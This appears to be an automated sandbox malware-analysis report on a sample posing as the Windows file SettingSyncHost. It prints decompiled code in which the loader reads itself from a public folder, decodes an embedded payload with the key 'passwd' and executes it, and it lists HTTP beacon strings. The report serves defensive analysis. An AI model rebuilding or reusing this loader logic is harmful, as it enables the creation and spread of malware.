                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Internet$CloseHandle$Unothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@$ErrorLast$Window$Concurrency::cancel_current_taskConnectConsoleOpenShow
                                                                                                                                      • String ID: /?id=$0J@$0`=$GET$Internet connection failed, error code = $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36$POST$Sending initial request failed, error code$Sending timer request failed, error code$ess.com$injuryl
                                                                                                                                      • API String ID: 172437446-746527591
                                                                                                                                      • Opcode ID: f10b0ede28213c4b9878ab48ec8c1f376b67f32a97dfb87d5d9ddad8275b3687
                                                                                                                                      • Instruction ID: 8a50ad18894c433cee11953073ad16db593db3a25db2e292dbdd59f6ff453f4c
                                                                                                                                      • Opcode Fuzzy Hash: f10b0ede28213c4b9878ab48ec8c1f376b67f32a97dfb87d5d9ddad8275b3687
                                                                                                                                      • Instruction Fuzzy Hash: B072F272D002488FEB16DB68DD49BEDBBB6AF45304F10819AE008BB3D1EB755E84CB51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00392A00, Relevance: 40.6, APIs: 20, Strings: 3, Instructions: 383filememorytimeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 484 392a00-392ee3 call 393700 call 3935b0 call 393460 call 393340 GetModuleHandleW call 3931a1 GetModuleFileNameW call 3931a1 call 393700 call 3935b0 call 393460 call 393340 CreateFileW call 3931a1 call 393700 call 3935b0 call 393460 call 393340 GetFileSize call 3931a1 GlobalAlloc call 3931a1 call 393700 call 3935b0 call 393460 call 393340 SetFilePointer call 3931a1 call 393700 call 3935b0 call 393460 call 393340 GetFileSize call 3931a1 ReadFile call 3931a1 call 393700 call 3935b0 call 393460 call 393340 call 393700 call 3935b0 call 393460 call 393340 call 394f30 call 393700 call 3935b0 call 393460 call 393340 GetSystemTime call 3931a1 call 393700 call 3935b0 call 393460 call 393340 call 393700 call 3935b0 call 393460 call 393340 call 394ea0 GetFileSize call 3931a1 call 39101e call 393700 call 3935b0 call 393460 call 393340 GetModuleHandleA call 3931a1 call 393700 call 3935b0 call 393460 call 393340 call 391032 call 393700 call 3935b0 call 393460 call 393340 call 39100a call 393700 call 3935b0 call 393460 call 393340 call 391028 call 393700 call 3935b0 call 393460 call 393340 call 391005 call 393700 call 3935b0 call 393460 call 393340 call 391019 call 3d9366 651 392ee9-392f01 call 3931a1 GetTickCount call 3931a1 484->651 656 392f0f-392f20 GetTickCount call 3931a1 651->656 657 392f03-392f0c call 394e3f 651->657 662 392f2c-392f3d GetTickCount call 3931a1 656->662 663 392f22-392f29 call 394cf3 656->663 657->656 668 392f49-392f5a GetTickCount call 3931a1 662->668 669 392f3f-392f46 call 394ba9 662->669 663->662 674 392f68-392f7b call 3931a1 668->674 675 392f5c-392f65 call 394a35 668->675 669->668 675->674
                                                                                                                                      C-Code - Quality: 46%
                                                                                                                                      			E00392A00(void* __ebx, void* __edx, void* __edi, void* __esi) {
				void _v196;
				void* __ebp;
				void* _t18;
				void* _t24;
				void* _t28;
				void* _t34;
				long _t35;
				void* _t41;
				long _t43;
				int _t44;
				void* _t50;
				void* _t60;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t88;
				intOrPtr _t94;
				intOrPtr _t111;
				intOrPtr _t113;
				void* _t114;
				void* _t119;
				void* _t121;
				void* _t123;
				void* _t131;
				void* _t132;
				void* _t135;
				void* _t136;
				void* _t157;
				void* _t158;
				long long* _t160;
				void* _t161;
				long long* _t162;
				void* _t163;
				long long* _t164;
				void* _t165;
				long long* _t166;
				void* _t167;
				long long* _t168;
				void* _t169;
				long long* _t170;
				long long* _t172;
				long long* _t175;
				void* _t176;
				long long* _t177;
				long long* _t179;
				void* _t181;
				long long* _t183;
				void* _t184;
				long long* _t185;
				long long* _t188;
				long long* _t191;
				long long* _t194;
				long long* _t197;
				void* _t199;
				long long _t222;
				long long _t223;
				long long _t224;
				long long _t225;
				long long _t226;
				long long _t227;
				long long _t228;
				long long _t229;
				long long _t230;
				long long _t231;
				long long _t232;
				long long _t233;
				long long _t234;
				long long _t235;
				long long _t236;
				long long _t237;

				_t135 = __edx;
				_t128 = __ebx;
				memset( &_v196, 0xcccccccc, 0x30 << 2);
				_t160 = _t158 + 0xc - 8;
				_t222 =  *0x3bbc50;
				 *_t160 = _t222;
				E00393700(_t135);
				 *_t160 = _t222;
				E003935B0(_t135);
				 *_t160 = _t222;
				E00393460(_t135);
				 *_t160 = _t222;
				E00393340();
				st0 = _t222;
				_t161 = _t160 + 8;
				E003931A1(GetModuleFileNameW(E003931A1(GetModuleHandleW(0), _t161 - _t161), "C:\Users\Public\SettingSyncHost", 0x208), _t161 - _t161);
				_t162 = _t161 - 8;
				_t223 =  *0x3bbc50;
				 *_t162 = _t223;
				E00393700(_t135);
				 *_t162 = _t223;
				E003935B0(_t135);
				 *_t162 = _t223;
				E00393460(_t135);
				 *_t162 = _t223;
				E00393340();
				st0 = _t223;
				_t163 = _t162 + 8;
				_t18 = CreateFileW("C:\Users\Public\SettingSyncHost", 0x80000000, 3, 0, 3, 0, 0); // executed
				 *0x4ee604 = E003931A1(_t18, _t163 - _t163);
				_t164 = _t163 - 8;
				_t224 =  *0x3bbc50;
				 *_t164 = _t224;
				E00393700(_t135);
				 *_t164 = _t224;
				E003935B0(_t135);
				 *_t164 = _t224;
				E00393460(_t135);
				 *_t164 = _t224;
				E00393340();
				st0 = _t224;
				_t165 = _t164 + 8;
				_t24 =  *0x4ee604; // 0xcc
				_t28 = GlobalAlloc(0, E003931A1(GetFileSize(_t24, 0), _t165 - _t165) + 0x2710); // executed
				 *0x4ee5b0 = E003931A1(_t28, _t165 - _t165);
				_t166 = _t165 - 8;
				_t225 =  *0x3bbc50;
				 *_t166 = _t225;
				E00393700(_t135);
				 *_t166 = _t225;
				E003935B0(_t135);
				 *_t166 = _t225;
				E00393460(_t135);
				 *_t166 = _t225;
				E00393340();
				st0 = _t225;
				_t167 = _t166 + 8;
				_t34 =  *0x4ee604; // 0xcc
				_t35 = SetFilePointer(_t34, 0, 0, 0); // executed
				E003931A1(_t35, _t167 - _t167);
				_t168 = _t167 - 8;
				_t226 =  *0x3bbc50;
				 *_t168 = _t226;
				E00393700(_t135);
				 *_t168 = _t226;
				E003935B0(_t135);
				 *_t168 = _t226;
				E00393460(_t135);
				 *_t168 = _t226;
				E00393340();
				st0 = _t226;
				_t169 = _t168 + 8;
				_t141 = _t169;
				_t41 =  *0x4ee604; // 0xcc
				_t43 = E003931A1(GetFileSize(_t41, 0), _t169 - _t169);
				_t131 =  *0x4ee5b0; // 0xe58c20
				_t136 =  *0x4ee604; // 0xcc
				_t44 = ReadFile(_t136, _t131, _t43, 0x4ee850, 0); // executed
				E003931A1(_t44, _t169 - _t169);
				_t170 = _t169 - 8;
				_t227 =  *0x3bbc50;
				 *_t170 = _t227;
				E00393700(_t136);
				 *_t170 = _t227;
				E003935B0(_t136);
				 *_t170 = _t227;
				E00393460(_t136);
				 *_t170 = _t227;
				E00393340();
				st0 = _t227;
				_t50 =  *0x4ee5b0; // 0xe58c20
				 *0x4ee5b0 = _t50 + 0x3ac00;
				_t172 = _t170 + 8 - 8;
				_t228 =  *0x3bbc50;
				 *_t172 = _t228;
				E00393700(_t136);
				 *_t172 = _t228;
				E003935B0(_t136);
				 *_t172 = _t228;
				E00393460(_t136);
				 *_t172 = _t228;
				E00393340();
				st0 = _t228;
				E00394F30("passwd", "aasswd");
				_t175 = _t172 + 0x10 - 8;
				_t229 =  *0x3bbc50;
				 *_t175 = _t229;
				E00393700(_t136);
				 *_t175 = _t229;
				E003935B0(_t136);
				 *_t175 = _t229;
				E00393460(_t136);
				 *_t175 = _t229;
				_t60 = E00393340();
				st0 = _t229;
				_t176 = _t175 + 8;
				GetSystemTime(0x4ee610);
				E003931A1(_t60, _t176 - _t176);
				_t177 = _t176 - 8;
				_t230 =  *0x3bbc50;
				 *_t177 = _t230;
				E00393700(_t136);
				 *_t177 = _t230;
				E003935B0(_t136);
				 *_t177 = _t230;
				E00393460(_t136);
				 *_t177 = _t230;
				E00393340();
				st0 = _t230;
				 *0x4ee5e0 = 0x4ee610->wYear & 0x0000ffff ^ 0x00000795;
				_t179 = _t177 + 8 - 8;
				_t231 =  *0x3bbc50;
				 *_t179 = _t231;
				E00393700(_t136);
				 *_t179 = _t231;
				E003935B0(_t136);
				 *_t179 = _t231;
				E00393460(_t136);
				 *_t179 = _t231;
				E00393340();
				st0 = _t231;
				_t72 = E00394EA0("passwd");
				_t181 = _t179 + 0xc;
				_t73 =  *0x4ee604; // 0xcc
				_t75 = E003931A1(GetFileSize(_t73, 0), _t181 - _t181);
				_t132 =  *0x4ee5b0; // 0xe58c20
				L0039101E(__ebx, _t169, _t181, _t132, _t75 - 0x3ac00, "passwd", _t72);
				_t183 = _t181 + 0x10 - 8;
				_t232 =  *0x3bbc50;
				 *_t183 = _t232;
				E00393700(_t136);
				 *_t183 = _t232;
				E003935B0(_t136);
				 *_t183 = _t232;
				E00393460(_t136);
				 *_t183 = _t232;
				E00393340();
				st0 = _t232;
				_t184 = _t183 + 8;
				_t151 = _t184;
				 *0x4ee5b8 = E003931A1(GetModuleHandleA(0), _t184 - _t184);
				_t185 = _t184 - 8;
				_t233 =  *0x3bbc50;
				 *_t185 = _t233;
				E00393700(_t136);
				 *_t185 = _t233;
				E003935B0(_t136);
				 *_t185 = _t233;
				E00393460(_t136);
				 *_t185 = _t233;
				E00393340();
				st0 = _t233;
				_t88 =  *0x4ee5b0; // 0xe58c20
				L00391032(__ebx, _t136, _t169, _t184, _t88); // executed
				_t188 = _t185 + 0xc - 8;
				_t234 =  *0x3bbc50;
				 *_t188 = _t234;
				E00393700(_t136);
				 *_t188 = _t234;
				E003935B0(_t136);
				 *_t188 = _t234;
				E00393460(_t136);
				 *_t188 = _t234;
				E00393340();
				st0 = _t234;
				_t94 =  *0x4ee5b8; // 0x390000
				L0039100A(__ebx, _t136, _t141, _t184, 0x3c8900, _t94);
				_t191 = _t188 + 0x10 - 8;
				_t235 =  *0x3bbc50;
				 *_t191 = _t235;
				E00393700(_t136);
				 *_t191 = _t235;
				E003935B0(_t136);
				 *_t191 = _t235;
				E00393460(_t136);
				 *_t191 = _t235;
				E00393340();
				st0 = _t235;
				L00391028(_t128, _t136, _t141, _t151, 0x3c8900); // executed
				_t194 = _t191 + 0xc - 8;
				_t236 =  *0x3bbc50;
				 *_t194 = _t236;
				E00393700(_t136);
				 *_t194 = _t236;
				E003935B0(_t136);
				 *_t194 = _t236;
				E00393460(_t136);
				 *_t194 = _t236;
				E00393340();
				st0 = _t236;
				L00391005(_t128, _t141, _t151, 0x3c8900); // executed
				_t197 = _t194 + 0xc - 8;
				_t237 =  *0x3bbc50;
				 *_t197 = _t237;
				E00393700(_t136);
				 *_t197 = _t237;
				E003935B0(_t136);
				 *_t197 = _t237;
				E00393460(_t136);
				 *_t197 = _t237;
				E00393340();
				st0 = _t237;
				L00391019(_t128, _t136, _t141, _t151, 0x3c8900);
				_t199 = _t197 + 0xc;
				_t111 =  *0x3c893c; // 0x100
				 *0x4ee600 = _t111 + 0x3c8900;
				_t113 =  *0x4ee600; // 0x3c8a00
				_t3 = _t113 + 0x28; // 0x10be8
				 *0x4ee5b4 =  *_t3 + 0x3c8900;
				_t114 =  *0x4ee5b4(); // executed
				E003931A1(_t114, _t199 - _t199);
				if(E003931A1(GetTickCount(), _t199 - _t199) == 0) {
					E00394E3F(0, 0);
					_t199 = _t199 + 8;
				}
				_t154 = _t199;
				_t119 = E003931A1(GetTickCount(), _t199 - _t199);
				_t216 = _t119;
				if(_t119 == 0) {
					_push(0);
					E00394CF3(_t128, _t136, _t141, _t154, _t216);
					_t199 = _t199 + 4;
				}
				_t155 = _t199;
				_t121 = E003931A1(GetTickCount(), _t199 - _t199);
				_t218 = _t121;
				if(_t121 == 0) {
					_push(0);
					E00394BA9(_t128, _t136, _t141, _t155, _t218);
					_t199 = _t199 + 4;
				}
				_t156 = _t199;
				_t123 = E003931A1(GetTickCount(), _t199 - _t199);
				_t220 = _t123;
				if(_t123 == 0) {
					_push(0);
					_push(0);
					_t123 = E00394A35(_t128, _t141, _t156, _t220);
					_t199 = _t199 + 8;
				}
				return E003931A1(_t123, _t157 - _t199 + 0xc0);
			}









































































                                                                                                                                      0x00392a00
                                                                                                                                      0x00392a00
                                                                                                                                      0x00392a1c
                                                                                                                                      0x00392a1e
                                                                                                                                      0x00392a21
                                                                                                                                      0x00392a27
                                                                                                                                      0x00392a2a
                                                                                                                                      0x00392a2f
                                                                                                                                      0x00392a32
                                                                                                                                      0x00392a37
                                                                                                                                      0x00392a3a
                                                                                                                                      0x00392a3f
                                                                                                                                      0x00392a42
                                                                                                                                      0x00392a47
                                                                                                                                      0x00392a49
                                                                                                                                      0x00392a72
                                                                                                                                      0x00392a77
                                                                                                                                      0x00392a7a
                                                                                                                                      0x00392a80
                                                                                                                                      0x00392a83
                                                                                                                                      0x00392a88
                                                                                                                                      0x00392a8b
                                                                                                                                      0x00392a90
                                                                                                                                      0x00392a93
                                                                                                                                      0x00392a98
                                                                                                                                      0x00392a9b
                                                                                                                                      0x00392aa0
                                                                                                                                      0x00392aa2
                                                                                                                                      0x00392abb
                                                                                                                                      0x00392ac8
                                                                                                                                      0x00392acd
                                                                                                                                      0x00392ad0
                                                                                                                                      0x00392ad6
                                                                                                                                      0x00392ad9
                                                                                                                                      0x00392ade
                                                                                                                                      0x00392ae1
                                                                                                                                      0x00392ae6
                                                                                                                                      0x00392ae9
                                                                                                                                      0x00392aee
                                                                                                                                      0x00392af1
                                                                                                                                      0x00392af6
                                                                                                                                      0x00392af8
                                                                                                                                      0x00392aff
                                                                                                                                      0x00392b1c
                                                                                                                                      0x00392b29
                                                                                                                                      0x00392b2e
                                                                                                                                      0x00392b31
                                                                                                                                      0x00392b37
                                                                                                                                      0x00392b3a
                                                                                                                                      0x00392b3f
                                                                                                                                      0x00392b42
                                                                                                                                      0x00392b47
                                                                                                                                      0x00392b4a
                                                                                                                                      0x00392b4f
                                                                                                                                      0x00392b52
                                                                                                                                      0x00392b57
                                                                                                                                      0x00392b59
                                                                                                                                      0x00392b64
                                                                                                                                      0x00392b6a
                                                                                                                                      0x00392b72
                                                                                                                                      0x00392b77
                                                                                                                                      0x00392b7a
                                                                                                                                      0x00392b80
                                                                                                                                      0x00392b83
                                                                                                                                      0x00392b88
                                                                                                                                      0x00392b8b
                                                                                                                                      0x00392b90
                                                                                                                                      0x00392b93
                                                                                                                                      0x00392b98
                                                                                                                                      0x00392b9b
                                                                                                                                      0x00392ba0
                                                                                                                                      0x00392ba2
                                                                                                                                      0x00392bae
                                                                                                                                      0x00392bb2
                                                                                                                                      0x00392bc0
                                                                                                                                      0x00392bc6
                                                                                                                                      0x00392bcd
                                                                                                                                      0x00392bd4
                                                                                                                                      0x00392bdc
                                                                                                                                      0x00392be1
                                                                                                                                      0x00392be4
                                                                                                                                      0x00392bea
                                                                                                                                      0x00392bed
                                                                                                                                      0x00392bf2
                                                                                                                                      0x00392bf5
                                                                                                                                      0x00392bfa
                                                                                                                                      0x00392bfd
                                                                                                                                      0x00392c02
                                                                                                                                      0x00392c05
                                                                                                                                      0x00392c0a
                                                                                                                                      0x00392c0f
                                                                                                                                      0x00392c19
                                                                                                                                      0x00392c1e
                                                                                                                                      0x00392c21
                                                                                                                                      0x00392c27
                                                                                                                                      0x00392c2a
                                                                                                                                      0x00392c2f
                                                                                                                                      0x00392c32
                                                                                                                                      0x00392c37
                                                                                                                                      0x00392c3a
                                                                                                                                      0x00392c3f
                                                                                                                                      0x00392c42
                                                                                                                                      0x00392c47
                                                                                                                                      0x00392c56
                                                                                                                                      0x00392c5e
                                                                                                                                      0x00392c61
                                                                                                                                      0x00392c67
                                                                                                                                      0x00392c6a
                                                                                                                                      0x00392c6f
                                                                                                                                      0x00392c72
                                                                                                                                      0x00392c77
                                                                                                                                      0x00392c7a
                                                                                                                                      0x00392c7f
                                                                                                                                      0x00392c82
                                                                                                                                      0x00392c87
                                                                                                                                      0x00392c89
                                                                                                                                      0x00392c93
                                                                                                                                      0x00392c9b
                                                                                                                                      0x00392ca0
                                                                                                                                      0x00392ca3
                                                                                                                                      0x00392ca9
                                                                                                                                      0x00392cac
                                                                                                                                      0x00392cb1
                                                                                                                                      0x00392cb4
                                                                                                                                      0x00392cb9
                                                                                                                                      0x00392cbc
                                                                                                                                      0x00392cc1
                                                                                                                                      0x00392cc4
                                                                                                                                      0x00392cc9
                                                                                                                                      0x00392cda
                                                                                                                                      0x00392cdf
                                                                                                                                      0x00392ce2
                                                                                                                                      0x00392ce8
                                                                                                                                      0x00392ceb
                                                                                                                                      0x00392cf0
                                                                                                                                      0x00392cf3
                                                                                                                                      0x00392cf8
                                                                                                                                      0x00392cfb
                                                                                                                                      0x00392d00
                                                                                                                                      0x00392d03
                                                                                                                                      0x00392d08
                                                                                                                                      0x00392d12
                                                                                                                                      0x00392d17
                                                                                                                                      0x00392d24
                                                                                                                                      0x00392d32
                                                                                                                                      0x00392d3d
                                                                                                                                      0x00392d44
                                                                                                                                      0x00392d4c
                                                                                                                                      0x00392d4f
                                                                                                                                      0x00392d55
                                                                                                                                      0x00392d58
                                                                                                                                      0x00392d5d
                                                                                                                                      0x00392d60
                                                                                                                                      0x00392d65
                                                                                                                                      0x00392d68
                                                                                                                                      0x00392d6d
                                                                                                                                      0x00392d70
                                                                                                                                      0x00392d75
                                                                                                                                      0x00392d77
                                                                                                                                      0x00392d7a
                                                                                                                                      0x00392d8b
                                                                                                                                      0x00392d90
                                                                                                                                      0x00392d93
                                                                                                                                      0x00392d99
                                                                                                                                      0x00392d9c
                                                                                                                                      0x00392da1
                                                                                                                                      0x00392da4
                                                                                                                                      0x00392da9
                                                                                                                                      0x00392dac
                                                                                                                                      0x00392db1
                                                                                                                                      0x00392db4
                                                                                                                                      0x00392db9
                                                                                                                                      0x00392dbe
                                                                                                                                      0x00392dc4
                                                                                                                                      0x00392dcc
                                                                                                                                      0x00392dcf
                                                                                                                                      0x00392dd5
                                                                                                                                      0x00392dd8
                                                                                                                                      0x00392ddd
                                                                                                                                      0x00392de0
                                                                                                                                      0x00392de5
                                                                                                                                      0x00392de8
                                                                                                                                      0x00392ded
                                                                                                                                      0x00392df0
                                                                                                                                      0x00392df5
                                                                                                                                      0x00392dfa
                                                                                                                                      0x00392e05
                                                                                                                                      0x00392e0d
                                                                                                                                      0x00392e10
                                                                                                                                      0x00392e16
                                                                                                                                      0x00392e19
                                                                                                                                      0x00392e1e
                                                                                                                                      0x00392e21
                                                                                                                                      0x00392e26
                                                                                                                                      0x00392e29
                                                                                                                                      0x00392e2e
                                                                                                                                      0x00392e31
                                                                                                                                      0x00392e36
                                                                                                                                      0x00392e40
                                                                                                                                      0x00392e48
                                                                                                                                      0x00392e4b
                                                                                                                                      0x00392e51
                                                                                                                                      0x00392e54
                                                                                                                                      0x00392e59
                                                                                                                                      0x00392e5c
                                                                                                                                      0x00392e61
                                                                                                                                      0x00392e64
                                                                                                                                      0x00392e69
                                                                                                                                      0x00392e6c
                                                                                                                                      0x00392e71
                                                                                                                                      0x00392e7b
                                                                                                                                      0x00392e83
                                                                                                                                      0x00392e86
                                                                                                                                      0x00392e8c
                                                                                                                                      0x00392e8f
                                                                                                                                      0x00392e94
                                                                                                                                      0x00392e97
                                                                                                                                      0x00392e9c
                                                                                                                                      0x00392e9f
                                                                                                                                      0x00392ea4
                                                                                                                                      0x00392ea7
                                                                                                                                      0x00392eac
                                                                                                                                      0x00392eb6
                                                                                                                                      0x00392ebb
                                                                                                                                      0x00392ebe
                                                                                                                                      0x00392ec8
                                                                                                                                      0x00392ecd
                                                                                                                                      0x00392ed2
                                                                                                                                      0x00392edb
                                                                                                                                      0x00392ee3
                                                                                                                                      0x00392eeb
                                                                                                                                      0x00392f01
                                                                                                                                      0x00392f07
                                                                                                                                      0x00392f0c
                                                                                                                                      0x00392f0c
                                                                                                                                      0x00392f0f
                                                                                                                                      0x00392f19
                                                                                                                                      0x00392f1e
                                                                                                                                      0x00392f20
                                                                                                                                      0x00392f22
                                                                                                                                      0x00392f24
                                                                                                                                      0x00392f29
                                                                                                                                      0x00392f29
                                                                                                                                      0x00392f2c
                                                                                                                                      0x00392f36
                                                                                                                                      0x00392f3b
                                                                                                                                      0x00392f3d
                                                                                                                                      0x00392f3f
                                                                                                                                      0x00392f41
                                                                                                                                      0x00392f46
                                                                                                                                      0x00392f46
                                                                                                                                      0x00392f49
                                                                                                                                      0x00392f53
                                                                                                                                      0x00392f58
                                                                                                                                      0x00392f5a
                                                                                                                                      0x00392f5c
                                                                                                                                      0x00392f5e
                                                                                                                                      0x00392f60
                                                                                                                                      0x00392f65
                                                                                                                                      0x00392f65
                                                                                                                                      0x00392f7b

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,C:\Users\Public\SettingSyncHost,00000208), ref: 00392A5C
                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000), ref: 00392A6A
                                                                                                                                        • Part of subcall function 003931A1: _RTC_Failure.LIBCMT ref: 003931B4
                                                                                                                                      • CreateFileW.KERNELBASE(C:\Users\Public\SettingSyncHost,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00392ABB
                                                                                                                                      • GetFileSize.KERNEL32(000000CC,00000000), ref: 00392B05
                                                                                                                                      • GlobalAlloc.KERNELBASE(00000000,-00002710), ref: 00392B1C
                                                                                                                                      • SetFilePointer.KERNELBASE(000000CC,00000000,00000000,00000000), ref: 00392B6A
                                                                                                                                      • GetFileSize.KERNEL32(000000CC,00000000,004EE850,00000000), ref: 00392BB8
                                                                                                                                      • ReadFile.KERNELBASE(000000CC,00E58C20,00000000), ref: 00392BD4
                                                                                                                                      • _strcat.LIBCMT ref: 00392C56
                                                                                                                                      • GetSystemTime.KERNEL32(004EE610), ref: 00392C93
                                                                                                                                      • _strlen.LIBCMT ref: 00392D12
                                                                                                                                      • GetFileSize.KERNEL32(000000CC,00000000,passwd,00000000), ref: 00392D2A
                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00392D7E
                                                                                                                                      • GetTickCount.KERNEL32 ref: 00392EF2
                                                                                                                                      • GetTickCount.KERNEL32 ref: 00392F11
                                                                                                                                      • _perror.LIBCMT ref: 00392F24
                                                                                                                                      • GetTickCount.KERNEL32 ref: 00392F2E
                                                                                                                                      • _wprintf.LIBCMT ref: 00392F41
                                                                                                                                      • GetTickCount.KERNEL32 ref: 00392F4B
                                                                                                                                      • _setlocale.LIBCMT ref: 00392F60
                                                                                                                                        • Part of subcall function 00394E3F: __wfsopen.LIBCMT ref: 00394E4C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$CountTick$ModuleSize$Handle$AllocCreateFailureGlobalNamePointerReadSystemTime__wfsopen_perror_setlocale_strcat_strlen_wprintf
                                                                                                                                      • String ID: C:\Users\Public\SettingSyncHost$aasswd$passwd
                                                                                                                                      • API String ID: 1808579253-4271608098
                                                                                                                                      • Opcode ID: 9eda9d0a0f512cb5910aabdff6bb9e8a69fb25f89dbc9b0703d4399baff8e7f3
                                                                                                                                      • Instruction ID: 4df71118f2aa992af0dd2576ed758ffbb562ca06af7bdcca57244c8cf04ad1d8
                                                                                                                                      • Opcode Fuzzy Hash: 9eda9d0a0f512cb5910aabdff6bb9e8a69fb25f89dbc9b0703d4399baff8e7f3
                                                                                                                                      • Instruction Fuzzy Hash: 57C141F1948505D6DA167B79EC8F62DFE64EF04709F4209B4F4C4591A2EF324E28839B
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00391200, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 201COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: E.9$E.9$HN
                                                                                                                                      • API String ID: 0-2062183627
                                                                                                                                      • Opcode ID: 93c327b60ad14be747b758385798ba56a4e336f1cf163c9e3563947ccfaa6146
                                                                                                                                      • Instruction ID: 7cdd41354137134373b700973efa93a56e0795d1c081bb609876762c97770249
                                                                                                                                      • Opcode Fuzzy Hash: 93c327b60ad14be747b758385798ba56a4e336f1cf163c9e3563947ccfaa6146
                                                                                                                                      • Instruction Fuzzy Hash: 8071EDF0908406D6CB0A7F69E88F16CFFB4FF04759F0109A9F4C4591A2EF324A28875A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D0640, Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 850 3d0640-3d0690 call 3d9dea 853 3d06c1-3d06c7 850->853 854 3d0692-3d06a1 call 3d9dea 850->854 855 3d06d9 853->855 856 3d06c9-3d06d1 853->856 863 3d06b3-3d06bb call 3d9e42 854->863 864 3d06a3-3d06ae 854->864 860 3d06db-3d06df 855->860 858 3d06d7 856->858 859 3d0766-3d078b call 3d9e42 call 3d8ec4 856->859 858->860 865 3d06f1-3d06f3 860->865 866 3d06e1-3d06e9 call 3d9fc7 860->866 863->853 864->863 865->859 870 3d06f5-3d06f7 865->870 866->870 878 3d06eb-3d06ee 866->878 874 3d06fd-3d0718 call 3d8ed5 870->874 875 3d06f9-3d06fb 870->875 880 3d071a-3d071f 874->880 881 3d0726 874->881 875->859 878->865 882 3d072b-3d072f call 3cb580 880->882 883 3d0721-3d0724 880->883 881->882 885 3d0734-3d0760 call 3cb630 call 3d9f9b 882->885 883->882 885->859
                                                                                                                                      APIs
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D0676
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D0696
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D06B6
                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 003D0751
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D0769
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
